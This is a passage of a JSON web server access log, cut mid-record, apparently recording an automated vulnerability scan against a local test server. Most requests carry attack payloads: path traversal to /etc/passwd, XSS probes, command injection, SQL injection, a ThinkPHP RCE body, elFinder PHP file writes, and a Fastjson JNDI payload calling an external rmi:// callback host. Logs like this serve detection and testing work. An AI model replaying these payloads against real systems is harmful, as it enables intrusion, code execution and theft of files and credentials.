HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:40 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca281d8smpvb9r2g07h0r8gftaffcmncg.oast.site/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=29K9NHqLASdtit8lFHR33r2kzMe.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%2229K9NIKQDk20jn03PX0uHw0hV2J%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder 